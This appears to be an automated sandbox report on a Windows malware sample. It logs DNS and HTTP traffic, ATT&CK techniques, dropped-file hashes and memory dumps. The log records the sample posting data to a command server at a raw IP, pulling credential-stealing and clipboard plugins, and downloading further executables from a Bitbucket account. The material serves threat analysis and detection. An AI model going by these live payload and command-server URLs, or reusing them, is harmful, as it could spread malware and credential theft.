x-amz-id-2: arsGCXekbLMv5LXzHCaRULBfXF5zJ1IDoio8mltvrs81NSCErA8piFVr0gQR0bGJr7xENb9rFqY=
x-amz-request-id: CYJ0Q3CTD931HYY4
Date: Mon, 22 Jul 2024 05:14:17 GMT
Last-Modified: Sun, 21 Jul 2024 06:11:12 GMT
ETag: "255d242aa144a03386b128026239fb19-2"
x-amz-server-side-encryption: AES256
x-amz-version-id: EXuF_iO83RkaLJkoSIvY0uobyEXyjLz0
Content-Disposition: attachment; filename="ash.exe"
Accept-Ranges: bytes
Content-Type: application/x-msdownload
Server: AmazonS3
Content-Length: 9948672
DNS

99.97.216.52.in-addr.arpa

Remote address:

8.8.8.8:53

Request

99.97.216.52.in-addr.arpa

IN PTR

Response

99.97.216.52.in-addr.arpa

IN PTR

s3-1-w amazonawscom
DNS

112.149.244.18.in-addr.arpa

Remote address:

8.8.8.8:53

Request

112.149.244.18.in-addr.arpa

IN PTR

Response

112.149.244.18.in-addr.arpa

IN PTR

server-18-244-149-112waw51r cloudfrontnet
DNS

212.96.244.18.in-addr.arpa

Remote address:

8.8.8.8:53

Request

212.96.244.18.in-addr.arpa

IN PTR

Response

212.96.244.18.in-addr.arpa

IN PTR

server-18-244-96-212waw51r cloudfrontnet
DNS

ocsp.r2m01.amazontrust.com

Hkbsse.exe

Remote address:

8.8.8.8:53

Request

ocsp.r2m01.amazontrust.com

IN A

Response

ocsp.r2m01.amazontrust.com

IN A

18.66.235.222
GET

http://ocsp.r2m01.amazontrust.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBShdVEFnSEQ0gG5CBtzM48cPMe9XwQUgbgOY4qJEhjl%2Bjs7UJWf5uWQE4UCEAO9ExOMvLBqk2jkjdZnyjA%3D

Hkbsse.exe

Remote address:

18.66.235.222:80

Request

GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBShdVEFnSEQ0gG5CBtzM48cPMe9XwQUgbgOY4qJEhjl%2Bjs7UJWf5uWQE4UCEAO9ExOMvLBqk2jkjdZnyjA%3D HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/10.0
Host: ocsp.r2m01.amazontrust.com

Response

HTTP/1.1 200 OK

Content-Type: application/ocsp-response
Content-Length: 471
Connection: keep-alive
Accept-Ranges: bytes
Cache-Control: max-age=7200
Date: Mon, 22 Jul 2024 04:29:50 GMT
Last-Modified: Mon, 22 Jul 2024 04:29:50 GMT
Server: ECAcc (frc/4CD7)
X-Cache: Hit from cloudfront
Via: 1.1 1a77be77b0d4f395c20654f9f7d676c4.cloudfront.net (CloudFront)
X-Amz-Cf-Pop: WAW51-P1
X-Amz-Cf-Id: NuxSvrMT6S8qcMDrqpemYbYQC_gq0wvUMIp0Np52Zs2FmVQ-nCANPw==
Age: 2600
DNS

222.235.66.18.in-addr.arpa

Remote address:

8.8.8.8:53

Request

222.235.66.18.in-addr.arpa

IN PTR

Response

222.235.66.18.in-addr.arpa

IN PTR

server-18-66-235-222waw51r cloudfrontnet
POST

http://77.91.77.140/g9bkfkWf/index.php

rundll32.exe

Remote address:

77.91.77.140:80

Request

POST /g9bkfkWf/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 77.91.77.140
Content-Length: 21
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Mon, 22 Jul 2024 05:13:15 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
POST

http://77.91.77.140/g9bkfkWf/index.php

rundll32.exe

Remote address:

77.91.77.140:80

Request

POST /g9bkfkWf/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 77.91.77.140
Content-Length: 5
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Mon, 22 Jul 2024 05:13:32 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
DNS

172.214.232.199.in-addr.arpa

Remote address:

8.8.8.8:53

Request

172.214.232.199.in-addr.arpa

IN PTR

Response
GET

https://bitbucket.org/Programs_file/download/downloads/ash.exe

Hkbsse.exe

Remote address:

185.166.141.7:443

Request

GET /Programs_file/download/downloads/ash.exe HTTP/1.1
Host: bitbucket.org

Response

HTTP/1.1 302 Found

Date: Mon, 22 Jul 2024 05:14:15 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 0
Server: AtlassianEdge
Location: https://bbuseruploads.s3.amazonaws.com/74eddf21-5def-4764-b6df-12efa9e0cd5e/downloads/dadec6ec-b604-436e-8627-54b1d38756e3/ash.exe?response-content-disposition=attachment%3B%20filename%3D%22ash.exe%22&AWSAccessKeyId=ASIA6KOSE3BNEHVLW7YH&Signature=Ry%2B5wjPKEl6icGMoWp4FYztOsVY%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEJb%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FwEaCXVzLWVhc3QtMSJHMEUCIGIRfVctv6uOVDjw6mrBBRGusTnbFsHmK2M1GNju%2BdvTAiEAwX6jeFkiq0ebUzMrMACxAlIEyGm9raMoLzN5d0ZWSlQqpwIIbhAAGgw5ODQ1MjUxMDExNDYiDBWWBQFvyNqTXuFwzSqEAtBEHcTeMXxMYA3ykOyo66g5kjoEkAakifwDGXdGDVTDyB4%2FQ1oW6I%2B0jsVRp3VzXLPzePQ5mPQc2RejJt%2BCrCsX1epUb3J1HxacqdI2rKxgsj%2F%2BfuPP0ehvA2FOiXOOO8Fiv6zc0TVR6dch9aKMT%2B9ulfuPA7%2FJP3Zg0FmeNPPgr2T%2FsW9pkNnO4yYsHNxsWa2krP5EqFXjWU7Mahek7a5HowoZpED3exsFO9l5xVU%2FzdsiN9PSRMKD4vaQK6aNewDv0PvDoC3ZW9lUZKjZPQfAzIR6SS7EUmF62V%2BvhbvW3VzH8KXG4rttDx8MEMO2AscC7FVMpIxyrzXpNj5ctvs8DrEDMITV97QGOp0BnASNbq8ZXAkZsuF8JtLcoE7g48NN%2BlEXqAAun0VBcgqocpIYuqGc0kkoukMkBc6Ms37aSalzAJM7UPaqX%2FUtj2gV3Z1uRYFkX0i6U22B9PZTqTPo%2BY0HvDLmzGdmTV2WZKo9MFf5O7MuUu3xIHZ2qfHiuJjwB4ktUAJ%2FdAX5DAw5yMSL6NOQmFtnWfbv7M4iJ8OhKDRIz91MisV1mA%3D%3D&Expires=1721627020
Expires: Mon, 22 Jul 2024 05:14:15 GMT
Cache-Control: max-age=0, no-cache, no-store, must-revalidate, private
X-Used-Mesh: False
Vary: Accept-Language, Origin
Content-Language: en
X-View-Name: bitbucket.apps.downloads.views.download_file
X-Dc-Location: Micros-3
X-Served-By: 110828c18a94
X-Version: efda2a1a4208
X-Static-Version: efda2a1a4208
X-Request-Count: 502
X-Render-Time: 0.046732187271118164
X-B3-Traceid: c3a1c5e16abc46aa86baa4d3e05b3407
X-B3-Spanid: 7c99cb833bf7f910
X-Frame-Options: SAMEORIGIN
Content-Security-Policy: default-src 'self' 'unsafe-inline' 'unsafe-eval' data: blob: *; style-src 'self' 'unsafe-inline' https://aui-cdn.atlassian.com/ https://cdn.cookielaw.org/ https://d301sr5gafysq2.cloudfront.net/ https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/; connect-src bitbucket.org *.bitbucket.org bb-inf.net *.bb-inf.net id.atlassian.com api.atlassian.com api.stg.atlassian.com wss://bitbucketci-ws-service.services.atlassian.com/ wss://bitbucketci-ws-service.stg.services.atlassian.com/ wss://bitbucketci-ws-service.dev.services.atlassian.com/ analytics.atlassian.com atlassian-cookies--categories.us-east-1.prod.public.atl-paas.net as.atlassian.com api-private.stg.atlassian.com api-private.atlassian.com atl-global.atlassian.com cofs.staging.public.atl-paas.net cofs.prod.public.atl-paas.net fd-assets.prod.atl-paas.net flight-deck-assets-bifrost.prod-east.frontend.public.atl-paas.net intake.opbeat.com api.media.atlassian.com api.segment.io xid.statuspage.io xid.atlassian.com xid.sourcetreeapp.com bam.nr-data.net bam-cell.nr-data.net www.google-analytics.com sentry.io *.ingest.sentry.io events.launchdarkly.com app.launchdarkly.com fd-config.us-east-1.prod.public.atl-paas.net fd-config-bifrost.prod-east.frontend.public.atl-paas.net micros--prod-west--bitbucketci-file-service--files.s3.us-west-1.amazonaws.com micros--stg-west--bitbucketci-file-service--files.s3.us-west-1.amazonaws.com micros--ddev-west--bitbucketci-file-service--files.s3.ap-southeast-2.amazonaws.com bqlf8qjztdtr.statuspage.io https://d301sr5gafysq2.cloudfront.net/ https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/; object-src 'none'; script-src 'unsafe-eval' 'strict-dynamic' 'unsafe-inline' 'self' http: https: https://remote-app-switcher.stg-east.frontend.public.atl-paas.net https://remote-app-switcher.prod-east.frontend.public.atl-paas.net https://d301sr5gafysq2.cloudfront.net/ https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/; base-uri 'self'; frame-ancestors 'self' start.atlassian.com start.stg.atlassian.com atlaskit.atlassian.com bitbucket.org; report-uri https://web-security-reports.services.atlassian.com/csp-report/bb-website
X-Usage-Quota-Remaining: 999046.746
X-Usage-Request-Cost: 966.57
X-Usage-User-Time: 0.024839
X-Usage-System-Time: 0.004158
X-Usage-Input-Ops: 0
X-Usage-Output-Ops: 0
Age: 0
X-Cache: MISS
X-Content-Type-Options: nosniff
X-Xss-Protection: 1; mode=block
Atl-Traceid: c3a1c5e16abc46aa86baa4d3e05b3407
Report-To: {"endpoints": [{"url": "https://dz8aopenkvv6s.cloudfront.net"}], "group": "endpoint-1", "include_subdomains": true, "max_age": 600}
Nel: {"failure_fraction": 0.001, "include_subdomains": true, "max_age": 600, "report_to": "endpoint-1"}
Strict-Transport-Security: max-age=63072000; includeSubDomains; preload
DNS

106.212.244.185.in-addr.arpa

Remote address:

8.8.8.8:53

Request

106.212.244.185.in-addr.arpa

IN PTR

Response

106.212.244.185.in-addr.arpa

IN PTR

no-mans-landm247com
DNS

24.173.189.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

24.173.189.20.in-addr.arpa

IN PTR

Response
POST

http://77.91.77.140/g9bkfkWf/index.php?scr=1

Hkbsse.exe

Remote address:

77.91.77.140:80

Request

POST /g9bkfkWf/index.php?scr=1 HTTP/1.1
Content-Type: multipart/form-data; boundary=----NzY1ODA=
Host: 77.91.77.140
Content-Length: 76732
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Mon, 22 Jul 2024 05:16:06 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
POST

http://77.91.77.140/g9bkfkWf/index.php

Hkbsse.exe

Remote address:

77.91.77.140:80

Request

POST /g9bkfkWf/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 77.91.77.140
Content-Length: 4
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Mon, 22 Jul 2024 05:17:29 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Refresh: 0; url = Login.php
POST

http://77.91.77.140/g9bkfkWf/index.php

Hkbsse.exe

Remote address:

77.91.77.140:80

Request

POST /g9bkfkWf/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 77.91.77.140
Content-Length: 158
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Mon, 22 Jul 2024 05:17:29 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive

77.91.77.140:80

http://77.91.77.140/g9bkfkWf/index.php

http

Hkbsse.exe

297.3kB
1.5MB
4476
1169

HTTP Request

POST http://77.91.77.140/g9bkfkWf/index.php?scr=1

HTTP Response

200

HTTP Request

GET http://77.91.77.140/g9bkfkWf/Plugins/cred64.dll

HTTP Response

200

HTTP Request

GET http://77.91.77.140/g9bkfkWf/Plugins/clip64.dll

HTTP Response

200

HTTP Request

POST http://77.91.77.140/g9bkfkWf/index.php

HTTP Response

200

HTTP Request

POST http://77.91.77.140/g9bkfkWf/index.php

HTTP Response

200
77.91.77.140:80

http://77.91.77.140/g9bkfkWf/index.php

http

Hkbsse.exe

1.2kB
1.0kB
10
7

HTTP Request

POST http://77.91.77.140/g9bkfkWf/index.php

HTTP Response

200

HTTP Request

POST http://77.91.77.140/g9bkfkWf/index.php

HTTP Response

200
185.166.141.7:443

https://bitbucket.org/Programs_file/download/downloads/expert.exe

tls, http

Hkbsse.exe

1.1kB
8.6kB
16
13

HTTP Request

GET https://bitbucket.org/Programs_file/download/downloads/expert.exe

HTTP Response

302
52.216.97.99:443

https://bbuseruploads.s3.amazonaws.com/74eddf21-5def-4764-b6df-12efa9e0cd5e/downloads/dadec6ec-b604-436e-8627-54b1d38756e3/ash.exe?response-content-disposition=attachment%3B%20filename%3D%22ash.exe%22&AWSAccessKeyId=ASIA6KOSE3BNEHVLW7YH&Signature=Ry%2B5wjPKEl6icGMoWp4FYztOsVY%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEJb%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FwEaCXVzLWVhc3QtMSJHMEUCIGIRfVctv6uOVDjw6mrBBRGusTnbFsHmK2M1GNju%2BdvTAiEAwX6jeFkiq0ebUzMrMACxAlIEyGm9raMoLzN5d0ZWSlQqpwIIbhAAGgw5ODQ1MjUxMDExNDYiDBWWBQFvyNqTXuFwzSqEAtBEHcTeMXxMYA3ykOyo66g5kjoEkAakifwDGXdGDVTDyB4%2FQ1oW6I%2B0jsVRp3VzXLPzePQ5mPQc2RejJt%2BCrCsX1epUb3J1HxacqdI2rKxgsj%2F%2BfuPP0ehvA2FOiXOOO8Fiv6zc0TVR6dch9aKMT%2B9ulfuPA7%2FJP3Zg0FmeNPPgr2T%2FsW9pkNnO4yYsHNxsWa2krP5EqFXjWU7Mahek7a5HowoZpED3exsFO9l5xVU%2FzdsiN9PSRMKD4vaQK6aNewDv0PvDoC3ZW9lUZKjZPQfAzIR6SS7EUmF62V%2BvhbvW3VzH8KXG4rttDx8MEMO2AscC7FVMpIxyrzXpNj5ctvs8DrEDMITV97QGOp0BnASNbq8ZXAkZsuF8JtLcoE7g48NN%2BlEXqAAun0VBcgqocpIYuqGc0kkoukMkBc6Ms37aSalzAJM7UPaqX%2FUtj2gV3Z1uRYFkX0i6U22B9PZTqTPo%2BY0HvDLmzGdmTV2WZKo9MFf5O7MuUu3xIHZ2qfHiuJjwB4ktUAJ%2FdAX5DAw5yMSL6NOQmFtnWfbv7M4iJ8OhKDRIz91MisV1mA%3D%3D&Expires=1721627020

tls, http

Hkbsse.exe

701.7kB
20.7MB
14828
14824

HTTP Request

GET https://bbuseruploads.s3.amazonaws.com/74eddf21-5def-4764-b6df-12efa9e0cd5e/downloads/6e806f89-6e04-4ef5-aced-2dc086f628b4/expert.exe?response-content-disposition=attachment%3B%20filename%3D%22expert.exe%22&AWSAccessKeyId=ASIA6KOSE3BNBKMVEH55&Signature=ZOptpmfcdbDAJDK0GAI8IErFwVg%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEJb%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FwEaCXVzLWVhc3QtMSJIMEYCIQC%2B%2B9xAlafuRd9tpRNPUeQaDSQhu95UAvDqmqjRa0iT%2FAIhALyn4y3kU0m5%2B%2BaSpw7InvjwNB1DVlXoWABm%2FTz0HIx9KqcCCG4QABoMOTg0NTI1MTAxMTQ2IgwnNl0EuyVKylHU5AkqhAJX%2B1fEWKJh%2FUAq4mkySqWC4pOnTBRV8IUyNg%2B%2F2L4eeG56YEjHL1r0Zr%2B5L0QcadSrAFVby719CUil7onH13wccKPiA7odD95sZy6e5IRR8zZSDYc1ABwHjzumXQRxrNJP5Dzvy3smB6Iu61TOd853haxN9KBT3p9LH7Rj4oI0UvusQzProattsw%2Bqc28qSFkwM8mIA14xxv%2F4ff2I0uJfKGf3in0YwFEjry%2BwhpNiLRjtT4eOGyt27GI7bPumsw%2FAGXVvkBdWvhm4izrBPmo0JKS%2FTiVSlGbhC2LoWq9szBW5BYCcrrb0CPRmHoEovsK2%2F%2FiUHAwAOvvFQDy8NMjSpKZ3rTDi1Pe0BjqcAfxuv%2FYK1aA94GzSe6R6VfseG%2Fy9XjDvkb8T2FHacq5LFiwMMPOAlkFFQCbF8w4yfrufbnnEEaLscgp2PEYrPktOZS1oU4BWGkFUOPGWWnrPGZmHesorsjzn8WUdVJQAPxyr5QqlE3n%2FXkQE%2BI5LcymETD%2FW3dhO%2Ba%2Bcjp2iOMjgFv25f7OAXXRpzvootlPPmvRzidE%2FoDosWN%2BXmA%3D%3D&Expires=1721626986

HTTP Response

200

HTTP Request

GET https://bbuseruploads.s3.amazonaws.com/74eddf21-5def-4764-b6df-12efa9e0cd5e/downloads/dadec6ec-b604-436e-8627-54b1d38756e3/ash.exe?response-content-disposition=attachment%3B%20filename%3D%22ash.exe%22&AWSAccessKeyId=ASIA6KOSE3BNEHVLW7YH&Signature=Ry%2B5wjPKEl6icGMoWp4FYztOsVY%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEJb%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FwEaCXVzLWVhc3QtMSJHMEUCIGIRfVctv6uOVDjw6mrBBRGusTnbFsHmK2M1GNju%2BdvTAiEAwX6jeFkiq0ebUzMrMACxAlIEyGm9raMoLzN5d0ZWSlQqpwIIbhAAGgw5ODQ1MjUxMDExNDYiDBWWBQFvyNqTXuFwzSqEAtBEHcTeMXxMYA3ykOyo66g5kjoEkAakifwDGXdGDVTDyB4%2FQ1oW6I%2B0jsVRp3VzXLPzePQ5mPQc2RejJt%2BCrCsX1epUb3J1HxacqdI2rKxgsj%2F%2BfuPP0ehvA2FOiXOOO8Fiv6zc0TVR6dch9aKMT%2B9ulfuPA7%2FJP3Zg0FmeNPPgr2T%2FsW9pkNnO4yYsHNxsWa2krP5EqFXjWU7Mahek7a5HowoZpED3exsFO9l5xVU%2FzdsiN9PSRMKD4vaQK6aNewDv0PvDoC3ZW9lUZKjZPQfAzIR6SS7EUmF62V%2BvhbvW3VzH8KXG4rttDx8MEMO2AscC7FVMpIxyrzXpNj5ctvs8DrEDMITV97QGOp0BnASNbq8ZXAkZsuF8JtLcoE7g48NN%2BlEXqAAun0VBcgqocpIYuqGc0kkoukMkBc6Ms37aSalzAJM7UPaqX%2FUtj2gV3Z1uRYFkX0i6U22B9PZTqTPo%2BY0HvDLmzGdmTV2WZKo9MFf5O7MuUu3xIHZ2qfHiuJjwB4ktUAJ%2FdAX5DAw5yMSL6NOQmFtnWfbv7M4iJ8OhKDRIz91MisV1mA%3D%3D&Expires=1721627020

HTTP Response

200
18.66.235.222:80

http://ocsp.r2m01.amazontrust.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBShdVEFnSEQ0gG5CBtzM48cPMe9XwQUgbgOY4qJEhjl%2Bjs7UJWf5uWQE4UCEAO9ExOMvLBqk2jkjdZnyjA%3D

http

Hkbsse.exe

519 B
1.2kB
6
5

HTTP Request

GET http://ocsp.r2m01.amazontrust.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBShdVEFnSEQ0gG5CBtzM48cPMe9XwQUgbgOY4qJEhjl%2Bjs7UJWf5uWQE4UCEAO9ExOMvLBqk2jkjdZnyjA%3D

HTTP Response

200
77.91.77.140:80

http://77.91.77.140/g9bkfkWf/index.php

http

rundll32.exe

402 B
322 B
5
3

HTTP Request

POST http://77.91.77.140/g9bkfkWf/index.php

HTTP Response

200
77.91.77.140:80

http://77.91.77.140/g9bkfkWf/index.php

http

rundll32.exe

483 B
931 B
7
5

HTTP Request

POST http://77.91.77.140/g9bkfkWf/index.php

HTTP Response

200
185.166.141.7:443

https://bitbucket.org/Programs_file/download/downloads/ash.exe

tls, http

Hkbsse.exe

1.1kB
5.3kB
13
10

HTTP Request

GET https://bitbucket.org/Programs_file/download/downloads/ash.exe

HTTP Response

302
185.244.212.106:2227

ash.exe

1.8MB
46.4kB
1269
1067
77.91.77.140:80

http://77.91.77.140/g9bkfkWf/index.php?scr=1

http

Hkbsse.exe

296.6kB
10.4kB
4439
215

HTTP Request

POST http://77.91.77.140/g9bkfkWf/index.php?scr=1

HTTP Response

200
77.91.77.140:80

http://77.91.77.140/g9bkfkWf/index.php

http

Hkbsse.exe

734 B
587 B
6
4

HTTP Request

POST http://77.91.77.140/g9bkfkWf/index.php

HTTP Response

200

HTTP Request

POST http://77.91.77.140/g9bkfkWf/index.php

HTTP Response

200

8.8.8.8:53

140.77.91.77.in-addr.arpa

dns

71 B
131 B
1
1

DNS Request

140.77.91.77.in-addr.arpa
8.8.8.8:53

bitbucket.org

dns

Hkbsse.exe

118 B
107 B
2
1

DNS Request

bitbucket.org

DNS Request

bitbucket.org

DNS Response

185.166.141.7

185.166.141.8

185.166.141.9
8.8.8.8:53

7.141.166.185.in-addr.arpa

dns

72 B
132 B
1
1

DNS Request

7.141.166.185.in-addr.arpa
8.8.8.8:53

240.221.184.93.in-addr.arpa

dns

73 B
144 B
1
1

DNS Request

240.221.184.93.in-addr.arpa
8.8.8.8:53

bbuseruploads.s3.amazonaws.com

dns

Hkbsse.exe

76 B
254 B
1
1

DNS Request

bbuseruploads.s3.amazonaws.com

DNS Response

52.216.97.99

52.216.77.28

52.216.94.243

52.216.170.83

52.216.104.67

52.217.233.65

3.5.24.166

52.217.104.12
8.8.8.8:53

99.97.216.52.in-addr.arpa

dns

71 B
105 B
1
1

DNS Request

99.97.216.52.in-addr.arpa
8.8.8.8:53

112.149.244.18.in-addr.arpa

dns

73 B
131 B
1
1

DNS Request

112.149.244.18.in-addr.arpa
8.8.8.8:53

212.96.244.18.in-addr.arpa

dns

72 B
129 B
1
1

DNS Request

212.96.244.18.in-addr.arpa
8.8.8.8:53

ocsp.r2m01.amazontrust.com

dns

Hkbsse.exe

72 B
88 B
1
1

DNS Request

ocsp.r2m01.amazontrust.com

DNS Response

18.66.235.222
8.8.8.8:53

222.235.66.18.in-addr.arpa

dns

72 B
129 B
1
1

DNS Request

222.235.66.18.in-addr.arpa
8.8.8.8:53

172.214.232.199.in-addr.arpa

dns

74 B
128 B
1
1

DNS Request

172.214.232.199.in-addr.arpa
8.8.8.8:53

106.212.244.185.in-addr.arpa

dns

74 B
109 B
1
1

DNS Request

106.212.244.185.in-addr.arpa
8.8.8.8:53

24.173.189.20.in-addr.arpa

dns

72 B
158 B
1
1

DNS Request

24.173.189.20.in-addr.arpa

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Privilege Escalation

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Defense Evasion

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Credentials in Registry

T1552.002

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\1000005001\ash.exe

Filesize
9.5MB

MD5
7e10bd91154eca00420a74abb9967915

SHA1
4b59eec6aee1919dd17df3c4809689c5265a7077

SHA256
27ae0c25472fe22bbf6b33c2abc2ff061a540ccee039cbcda77c39ab4f0b9479

SHA512
58153a0f33a2d0dc1a6c033a6a67ef3ff5f4714a0911cfc4aa008468e714d0d771748ab61346ad56d2652a7c0f6b44937915d84b0a2bdad2794919bbfae13cdb

Download Submit
C:\Users\Admin\AppData\Local\Temp\604470191232

Filesize
74KB

MD5
781c6f731bfc66f4d3af23fcf9a44e6e

SHA1
0d668a44082606a05e01aa1f0ebc2145d5b03f90

SHA256
19fbcf2a768d4ef756fba3622ee02383504e412c8586355773b67a8d1493ae62

SHA512
1813ca0cef30541df3f1753a013688e6dbf9439f0349ece9c3fed6ac9ea5ec3cb249ebe3b4d4397ca7e2af25270f51ed4327c2823d87f47f509982f1ad5083d4

Download Submit
C:\Users\Admin\AppData\Local\Temp\674c1801fe\Hkbsse.exe

Filesize
9.6MB

MD5
4a0b3c363eeb8dfc1e9154dbc6a03a7b

SHA1
2e8077211e187d4add47910bacb888e66649bcec

SHA256
c62556c0c10d5441a43119bdc9ea3e5a0b92d2546ad0ad0b9cba482da8430bf1

SHA512
db8b6abb8f6907f8ab86cc3f240aa1bed980ad615f6bc60ac256ff14c516d84bd384d8fac410297dc7f6206fe4da61ef751ec13018122486374ddf0f6ecd05b3

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_wpsrjbsa.do5.ps1

Filesize
1B

MD5
c4ca4238a0b923820dcc509a6f75849b

SHA1
356a192b7913b04c54574d18c28d46e6395428ab

SHA256
6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

SHA512
4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

Download Submit
C:\Users\Admin\AppData\Roaming\8ed54a5ebdec82\clip64.dll

Filesize
127KB

MD5
8910655137f435fa57c2e0ea33a9891d

SHA1
91668d0b1215e2256d94a693e0856a017d58c7ab

SHA256
a4f61ffd3ab84471ac9d21e6d196d9e69b26d79005cc9f5e102eeb3265074597

SHA512
01946ee79d7ed545a0a332d15edb0410f4424078e415317e2af6bd395ab6c0ab566c84e8fee1fd157a9e48e164add40686c5e2724c5cd410a124c2af568a630a

Download Submit
C:\Users\Admin\AppData\Roaming\8ed54a5ebdec82\cred64.dll

Filesize
1.2MB

MD5
b179c992937daa9db2eb93c7d1aee21d

SHA1
5d2467cfba55fde65522779efd84f3a5e3980146

SHA256
5b5b914c69a2b8320c367795349914e531e16b44a56fd31665c797197fa94474

SHA512
31db1c209bf83f723dc668e873b7653561ec4b563c19b106e30df1e6b5a152bcc18ebcb818f1a98e88c355514d9b1dbdeb348b73a3df12c69dd745d6fd585bf2

Download Submit
memory/608-178-0x0000000000400000-0x0000000001350000-memory.dmp

Filesize
15.3MB

Download
memory/608-176-0x00000000014A0000-0x00000000014A1000-memory.dmp

Filesize
4KB

Download
memory/1368-173-0x0000000000400000-0x0000000001350000-memory.dmp

Filesize
15.3MB

Download
memory/1440-18-0x0000000000400000-0x0000000001350000-memory.dmp

Filesize
15.3MB

Download
memory/1968-137-0x0000000000400000-0x0000000001350000-memory.dmp

Filesize
15.3MB

Download
memory/1968-135-0x00000000015B0000-0x00000000015B1000-memory.dmp

Filesize
4KB

Download
memory/2700-167-0x0000000001370000-0x0000000001371000-memory.dmp

Filesize
4KB

Download
memory/2700-168-0x00000000000E0000-0x0000000000F9D000-memory.dmp

Filesize
14.7MB

Download
memory/4240-16-0x000000000046D000-0x00000000009B7000-memory.dmp

Filesize
5.3MB

Download
memory/4240-1-0x00000000001F0000-0x00000000001F1000-memory.dmp

Filesize
4KB

Download
memory/4240-5-0x0000000000400000-0x0000000001350000-memory.dmp

Filesize
15.3MB

Download
memory/4240-7-0x0000000000400000-0x0000000001350000-memory.dmp

Filesize
15.3MB

Download
memory/4240-15-0x0000000000400000-0x0000000001350000-memory.dmp

Filesize
15.3MB

Download
memory/4240-0-0x000000000046D000-0x00000000009B7000-memory.dmp

Filesize
5.3MB

Download
memory/4244-153-0x0000000000400000-0x0000000001350000-memory.dmp

Filesize
15.3MB

Download
memory/4244-151-0x00000000014B0000-0x00000000014B1000-memory.dmp

Filesize
4KB

Download
memory/4696-190-0x0000000001460000-0x0000000001461000-memory.dmp

Filesize
4KB

Download
memory/4696-192-0x0000000000400000-0x0000000001350000-memory.dmp

Filesize
15.3MB

Download
memory/4984-102-0x000002A035FB0000-0x000002A035FC2000-memory.dmp

Filesize
72KB

Download
memory/4984-65-0x000002A01DDF0000-0x000002A01DE12000-memory.dmp

Filesize
136KB

Download
memory/4984-68-0x000002A036130000-0x000002A0361A6000-memory.dmp

Filesize
472KB

Download
memory/4984-115-0x000002A035FA0000-0x000002A035FAA000-memory.dmp

Filesize
40KB

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

DNS Request

DNS Request

DNS Request

DNS Response

DNS Request

DNS Request

DNS Request

DNS Response

DNS Request

DNS Request

DNS Request

DNS Request

DNS Response

DNS Request

DNS Request

DNS Request

DNS Request

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

We care about your privacy.